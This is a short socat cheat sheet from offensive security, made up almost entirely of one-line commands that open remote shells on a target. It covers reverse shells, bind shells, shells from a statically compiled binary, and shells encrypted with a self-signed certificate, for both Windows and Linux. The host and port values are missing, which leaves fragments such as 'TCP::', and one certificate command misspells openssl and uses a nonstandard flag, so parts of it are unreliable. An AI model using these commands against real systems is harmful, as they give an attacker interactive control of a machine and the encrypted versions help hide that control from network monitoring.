# socat cheat sheet ## Reverse Shell ### reverse shell listener ```socat tcp-l: -``` ```socat TCP-L: file:`tty`,raw,echo=0``` ### windows target ```socat TCP:: EXEC:powershell.exe,pipes``` ### linux target ```socat TCP:: EXEC:"bash -li"``` ## Bind Shell ### generic connect ```socat TCP:: -``` ### windows target listener ```socat TCP-L: EXEC:powershell.exe,pipes``` ### linux target listener ```socat TCP-L: EXEC:"bash -li" ## Connect from statically compiled socat to LHOST Binary is inside this dir ```socat TCP:: EXEC:"bash -li",pty,stderr,sigint,setsid,sane``` ## Encrypted Shell ### create key + cert ```openssll req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt``` ### create pem file ```cat shell.key shell.crt > shell.pem``` ### reverse shell listener ```socat openssl-listen:,cert=shell.pem,verify=0 -``` ```socat openssl-listen:,cert=shell.pem,verify=0 file:`tty`,raw,echo=0``` ### connecting shell on target to listener ```socat openssl::,verify=0 exec:/bin/bash``` ```socat openssl::,verify=0 exec:"bash -li",pty,stderr,sigint,setsid,sane``` ### encrypted bind shell on windows listening * target ```socat openssl-listen::,verify=0 exec:cmd.exe,pipes``` ### encrypted bind shell attacker connecting ```socat openssl:,cert=shell.pem,verify=0 -```